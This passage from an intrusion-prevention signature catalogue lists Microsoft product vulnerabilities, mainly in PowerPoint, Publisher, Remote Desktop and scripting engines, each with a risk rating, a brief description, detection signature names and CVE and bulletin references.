OSVDB-54388
http://www.osvdb.org/54388

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556

About this vulnerability:

A memory corruption vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft PowerPoint.

Situation:

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556

References:

CVE-2009-0556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0556

BID-34351
http://www.securityfocus.com/bid/34351

OSVDB-53182
http://www.osvdb.org/53182

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128

About this vulnerability:

A vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft PowerPoint.

Situation:

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128

References:

CVE-2009-1128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1128

BID-34837
http://www.securityfocus.com/bid/34837

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129

About this vulnerability:

A vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft PowerPoint.

Situation:

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129

References:

CVE-2009-1129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1129

BID-34839
http://www.securityfocus.com/bid/34839

OSVDB-54387
http://www.osvdb.org/54387

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability

About this vulnerability:

An attempt to exploit PowerPoint vulnerability CVE-2011-0976

Risk:

Moderate

First detected in:

sgpkg-ips-388-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

A vulnerability in Microsoft PowerPoint record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability
File-OLE_Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability

References:

CVE-2011-0976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0976

MS11-022
http://technet.microsoft.com/security/bulletin/MS11-022

Microsoft-PowerPoint-OfficeArt-Shape-RCE-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft PowerPoint detected

Risk:

Moderate

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft PowerPoint detected

Situation:

File-OLE_Microsoft-PowerPoint-OfficeArt-Shape-RCE-Vulnerability

References:

CVE-2011-3413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3413

MS11-094
http://technet.microsoft.com/security/bulletin/MS11-094

Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution

About this vulnerability:

Code execution vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-83-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

Microsoft PowerPoint has a code execution vulnerability in the handling of invalid values in the vulnerable records. A remote attacker can exploit the vulnerability by persuading a target user to open a specially crafted PowerPoint file, causing a DoS condition terminating all instances of the PowerPoint application, and potentially leading to a loss of data or arbitrary code execution with the privileges of the currently logged in user.

Situation:

HTTP_Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
HTTP_Microsoft-PowerPoint-PPT-Document-Parsing-Exploit
File-OLE_Microsoft-PowerPoint-PPT-Document-Parsing-Code-Execution
File-OLE_Microsoft-PowerPoint-PPT-Document-Parsing-Exploit

References:

CVE-2006-5296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5296

BID-20495
http://www.securityfocus.com/bid/20495

OSVDB-29720
http://www.osvdb.org/29720

Microsoft-PowerPoint-PPT-File-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft PowerPoint

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft PowerPoint. The flaw is caused by insufficient checks of a malformed Record contained within a PowerPoint file. An attacker can exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. In an attack case where code injection is not successful, the vulnerable Microsoft PowerPoint application will terminate when the file is closed or saved. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. The affected application might also stop functioning as a result of such an attack.

Situation:

File-OLE_Microsoft-PowerPoint-PPT-File-Parsing-Memory-Corruption

References:

CVE-2006-3656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3656

BID-18993
http://www.securityfocus.com/bid/18993

Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269

About this vulnerability:

A vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-390-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint 2002; Microsoft PowerPoint 2003

Type:

Malfunction

Description:

There is a vulnerability in Microsoft PowerPoint.

Situation:

HTTP_SS-Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269
File-OLE_Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269

References:

CVE-2011-1270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1270

MS11-036
http://technet.microsoft.com/security/bulletin/MS11-036

Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269

About this vulnerability:

A vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-390-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint 2002; Microsoft PowerPoint 2003; Microsoft PowerPoint 2007; Microsoft Office 2004; Microsoft Office 2008

Type:

Malfunction

Description:

There is a vulnerability in Microsoft PowerPoint.

Situation:

HTTP_SS-Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269
File-OLE_Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269

References:

CVE-2011-1269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1269

MS11-036
http://technet.microsoft.com/security/bulletin/MS11-036

Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office PowerPoint

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint; Microsoft Office; Microsoft Office System

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft PowerPoint. The vulnerability is due to improper boundary checking while parsing the TxMasterStyle10Atom atom in a Powerpoint presentation file. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious PowerPoint file, potentially causing arbitrary code to be executed in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution
File-OLE_Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution

References:

CVE-2008-1455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1455

BID-30579
http://www.securityfocus.com/bid/30579

MS08-051
http://technet.microsoft.com/security/bulletin/MS08-051

Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft PowerPoint Viewer

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint Viewer

Type:

Integer Overflow

Description:

There is a code execution vulnerability in Microsoft PowerPoint Viewer. The vulnerability is due to a memory allocation error while handling malformed picture index in a PowerPoint file. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious PowerPoint file, potentially causing arbitrary code to be executed in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow
File-OLE_Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow

References:

CVE-2008-0121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0121

BID-30554
http://www.securityfocus.com/bid/30554

MS08-051
http://technet.microsoft.com/security/bulletin/MS08-051

Microsoft-PowerShell-Remoting-Tabexpansion-Sandbox-Bypass

About this vulnerability:

A vulnerability in Microsoft PowerShell

Risk:

High

First detected in:

sgpkg-ips-1550-5242

Last changed:

sgpkg-ips-1550-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A sandbox bypass vulnerability has been reported for Microsoft PowerShell. This vulnerability is due to exposure of a dangerous function in the TabExpansion function loaded from a PowerShell Remoting session. A remote, authenticated attacker can exploit this vulnerability by sending a crafted packet to the target server. Successful exploitation could result in execution of arbitrary code in the security context of the user running the service.

Situation:

File-TextId_Microsoft-PowerShell-Remoting-Tabexpansion-Sandbox-Bypass

References:

CVE-2022-41076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41076

ms22-dec
http://technet.microsoft.com/security/bulletin/ms22-dec

Microsoft-Print-Service-Impersonation-CVE-2010-2729

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-338-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows Print Spooler service.

Situation:

MSRPC-TCP_CPS-Microsoft-Print-Service-Impersonation-CVE-2010-2729
MSRPC-TCP_CPS-Microsoft-Print-Service-Usage-CVE-2010-2729

References:

CVE-2010-2729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2729

BID-43073
http://www.securityfocus.com/bid/43073

OSVDB-67988
http://www.osvdb.org/67988

MS10-061
http://technet.microsoft.com/security/bulletin/MS10-061

Microsoft-Print-Spooler-Service-RpcGetPrinterData-Function-DoS

About this vulnerability:

Denial of service vulnerability in Microsoft Print Spooler services GetPrinterData function

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000

Software:

<os>

Type:

Malfunction

Description:

Certain versions of Microsoft Print Spooler service suffer from a denial of service vulnerability where the server's memory can be exhausted with a malicious MSRPC GetPrinterData function call. Remote attackers can specify an arbitrary large 'offered' value in an MSRPC request to the service, causing the server to use all available memory while trying to allocate the requested amount of space.

Situation:

MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-RpcGetPrinterData-Function-DoS

References:

CVE-2006-6296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6296

BID-21401
http://www.securityfocus.com/bid/21401

Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Windows and Microsoft Office products. The vulnerability is due to improper input validation of a table in the TrueType font layout. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target system by enticing a target user to open a maliciously crafted document. In situations where code execution is successful the injected code will run within the security context of the currently logged-on user.

Situation:

HTTP_SS-Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption
File-Binary_Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption

References:

CVE-2010-2738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2738

BID-43068
http://www.securityfocus.com/bid/43068

MS10-063
http://technet.microsoft.com/security/bulletin/MS10-063

Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955

About this vulnerability:

A vulnerability in Microsoft Publisher

Risk:

High

First detected in:

sgpkg-ips-364-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher 2002

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Publisher.

Situation:

HTTP_SS-Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955
File-OLE_Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955

References:

CVE-2010-3955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3955

MS10-103
http://technet.microsoft.com/security/bulletin/MS10-103

Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Publisher

Risk:

High

First detected in:

sgpkg-ips-319-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher 2002; Microsoft Publisher 2003; Microsoft Publisher 2007

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Publisher.

Situation:

HTTP_SS-Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow
File-OLE_Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow

References:

CVE-2010-0479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0479

MS10-023
http://technet.microsoft.com/security/bulletin/MS10-023

Microsoft-Publisher-Invalid-Pointer-CVE-2011-3411

About this vulnerability:

A vulnerability in Microsoft Publisher

Risk:

High

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher 2003

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Publiser.

Situation:

File-OLE_Microsoft-Publisher-Invalid-Pointer-CVE-2011-3411

References:

CVE-2011-3411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3411

MS11-091
http://technet.microsoft.com/security/bulletin/MS11-091

Microsoft-Publisher-Memory-Corruption-CVE-2011-3412

About this vulnerability:

A vulnerability in Microsoft Publisher

Risk:

High

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher 2003; Microsoft Publisher 2007

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Publiser.

Situation:

File-OLE_Microsoft-Publisher-Memory-Corruption-CVE-2011-3412

References:

CVE-2011-3412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3412

MS11-091
http://technet.microsoft.com/security/bulletin/MS11-091

Microsoft-Publisher-Out-Of-Bounds-Array-Index-CVE-2011-3410

About this vulnerability:

A vulnerability in Microsoft Publisher

Risk:

High

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher 2003; Microsoft Publisher 2007

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Publiser.

Situation:

File-OLE_Microsoft-Publisher-Out-Of-Bounds-Array-Index-CVE-2011-3410

References:

CVE-2011-3410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3410

MS11-091
http://technet.microsoft.com/security/bulletin/MS11-091

Microsoft-Publisher-Pubconv.dll-Function-Pointer-Overwrite

About this vulnerability:

A vulnerability in Microsoft Office Publisher

Risk:

Moderate

First detected in:

sgpkg-ips-432-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Publisher, a component of Microsoft Office, that could allow a remote attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to an error in the pubconv.dll library during the handling of Microsoft Publisher files that allows control of a function pointer. Remote attackers could exploit this vulnerability by enticing the target user to insert a malicious Publisher file into another Publisher document. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged in user. An unsuccessful attempt will terminate the affected application abnormally.

Situation:

File-OLE_Microsoft-Publisher-Pubconv.dll-Function-Pointer-Overwrite

References:

CVE-2011-1508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1508

BID-50090
http://www.securityfocus.com/bid/50090

OSVDB-76460
http://www.osvdb.org/76460

MS11-091
http://technet.microsoft.com/security/bulletin/MS11-091

Microsoft-Publisher-Security-Features-Bypass-CVE-2024-38226

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Publisher detected

Risk:

High

First detected in:

sgpkg-ips-1775-5242

Last changed:

sgpkg-ips-1775-5242

Platform:

Windows

Software:

Microsoft Publisher; Microsoft Office

Type:

Input Validation

Description:

Microsoft Publisher's security features bypass Vulnerability.

Situation:

File-OLE_Microsoft-Publisher-Document-With-Suspicious-VBA-Script

References:

CVE-2024-38226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38226

ms24-sep
http://technet.microsoft.com/security/bulletin/ms24-sep

Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569

About this vulnerability:

A vulnerability in Microsoft Publisher

Risk:

High

First detected in:

sgpkg-ips-363-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher 2002; Microsoft Publisher 2007

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Publisher.

Situation:

HTTP_SS-Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569
File-OLE_Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569

References:

CVE-2010-2569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2569

MS10-103
http://technet.microsoft.com/security/bulletin/MS10-103

Microsoft-Remote-Administration-Protocol-Heap-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Remote Administration Protocol

Risk:

High

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Remote Administration Protocol.

Situation:

SMB-TCP_Microsoft-Remote-Administration-Protocol-Multiple-Vulnerabilities

References:

CVE-2012-1852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1852

BID-54931
http://www.securityfocus.com/bid/54931

OSVDB-84600
http://www.osvdb.org/84600

MS12-054
http://technet.microsoft.com/security/bulletin/MS12-054

Microsoft-Remote-Administration-Protocol-Stack-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Remote Administration Protocol

Risk:

High

First detected in:

sgpkg-ips-470-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Remote Administration Protocol.

Situation:

SMB-TCP_Microsoft-Remote-Administration-Protocol-Multiple-Vulnerabilities

References:

CVE-2012-1853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1853

BID-54940
http://www.securityfocus.com/bid/54940

OSVDB-84601
http://www.osvdb.org/84601

MS12-054
http://technet.microsoft.com/security/bulletin/MS12-054

Microsoft-Remote-Desktop-Connection-Manager-Xml-External-Entity-Injection

About this vulnerability:

A vulnerability in Microsoft Remote Desktop Connection Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1233-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Remote Desktop Connection Manager

Type:

Input Validation

Description:

Improper validation of RDG files causes an external entity injection vulnerability in Microsoft Remote Desktop Connection Manager. A successful exploit may allow an attacker to gain access to information on the target system.

Situation:

File-Text_Microsoft-Remote-Desktop-Connection-Manager-Xml-External-Entity-Injection

References:

CVE-2020-0765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0765

Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2011-0029

About this vulnerability:

A vulnerability in Microsoft Remote Desktop

Risk:

High

First detected in:

sgpkg-ips-380-4219

Last changed:

sgpkg-ips-1638-5242

Platform:

Windows

Software:

Microsoft Remote Desktop Client

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Remote Desktop.

Situation:

HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS-Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2010-0029

References:

CVE-2011-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0029

BID-46678
http://www.securityfocus.com/bid/46678

OSVDB-71014
http://www.osvdb.org/71014

MS11-017
http://technet.microsoft.com/security/bulletin/MS11-017

Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044

About this vulnerability:

Clientside remote code execution vulnerability in Remote Desktop

Risk:

High

First detected in:

sgpkg-ips-238-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A client side vulnerability exists in Microsotf Remote Desktop Software. If a user connects to a malicious HTTP-server, the remote server can trigger the vulnerability in the ActiveX component and execute arbitrary code in the victim's computer

Situation:

HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
HTTP_SS-Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044

References:

CVE-2009-1929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1929

BID-35973
http://www.securityfocus.com/bid/35973

OSVDB-56912
http://www.osvdb.org/56912

MS09-044
http://technet.microsoft.com/security/bulletin/MS09-044

Microsoft-Remote-Desktop-Web-Access-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-408-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2008 R2

Software:

<os>

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists in Microsoft Remote Desktop Web Access. The vulnerability is due to insufficient validation of user-supplied input in login.asp. A remote attacker can exploit this flaw by enticing a target to open a malicious URL link. Successful exploitation would result in execution of script code in the user's browser session, in the security context of the affected Web site.

Situation:

HTTP_CSU-Microsoft-Remote-Desktop-Web-Access-Cross-Site-Scripting

References:

CVE-2011-1263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1263

BID-49040
http://www.securityfocus.com/bid/49040

OSVDB-74406
http://www.osvdb.org/74406

MS11-061
http://technet.microsoft.com/security/bulletin/MS11-061

Microsoft-Report-Viewer-Control-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Report Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Report Viewer; Microsoft Visual Studio

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists in Microsoft Report Viewer. The vulnerability is due to an input validation error in the Report Viewer control while processing the TimerMethod parameter. An attacker can exploit this vulnerability to execute script code in a target user's browser within the context of the affected website.

Situation:

HTTP_CRL-Microsoft-Report-Viewer-Control-Cross-Site-Scripting

References:

CVE-2011-1976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1976

OSVDB-74396
http://www.osvdb.org/74396

MS11-067
http://technet.microsoft.com/security/bulletin/MS11-067

Microsoft-Report-Viewer-XSS-Vulnerability-CVE-2011-1976

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Report Viewer detected

Risk:

Moderate

First detected in:

sgpkg-ips-406-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Report Viewer; Microsoft Visual Studio

Type:

Cross-site Scripting

Description:

A vulnerability in Microsoft Report Viewer Components

Situation:

HTTP_CSU-Microsoft-Report-Viewer-XSS-Vulnerability-CVE-2011-1976

References:

CVE-2011-1976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1976

MS11-067
http://technet.microsoft.com/security/bulletin/MS11-067

Microsoft-Rich-Textbox-Control-Savefile-Insecure-Method-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in Microsoft Visual Studio

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Studio

Type:

Malfunction

Description:

There is a file overwriting vulnerability in Microsoft Rich Textbox Control ActiveX control. The flaw is due to a lack of path verification in the control's SaveFile method. A remote attacker may exploit this vulnerability via a specially crafted web page to create or modify arbitrary files on the target system.

Situation:

File-Text_MS-Rich-Textbox-Control-Insecure-Method-Arbitrary-File-Overwrite

References:

CVE-2008-0237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0237

BID-27201
http://www.securityfocus.com/bid/27201

Microsoft-Schannel-CVE-2010-3229

About this vulnerability:

A Microsoft Schannel vulnerability

Risk:

High

First detected in:

sgpkg-ips-347-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability exists in Microsoft Schannel.

Situation:

HTTPS_CS-Schannel-CVE-2010-3229

References:

CVE-2010-3229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3229

BID-43780
http://www.securityfocus.com/bid/43780

MS10-085
http://technet.microsoft.com/security/bulletin/MS10-085

Microsoft-Scripting-Engine-CVE-2016-0189-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-847-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer's VBScript and JScript engines.

Situation:

File-Text_Microsoft-Scripting-Engine-CVE-2016-0189-Memory-Corruption

References:

CVE-2016-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189

MS16-053
http://technet.microsoft.com/security/bulletin/MS16-053

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0834

About this vulnerability:

A vulnerability in Miscrosoft Edge

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0834

References:

CVE-2018-0834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0834

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0835

About this vulnerability:

A vulnerability in Miscrosoft Edge

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0835

References:

CVE-2018-0835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0835

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0837

About this vulnerability:

A vulnerability in Miscrosoft Edge

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0837

References:

CVE-2018-0837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0837

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0838

About this vulnerability:

A vulnerability in Miscrosoft Edge

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in the scripting engine of Microsoft Edge. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0838

References:

CVE-2018-0838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0838

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0840

About this vulnerability:

A vulnerability in Miscrosoft Edge

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

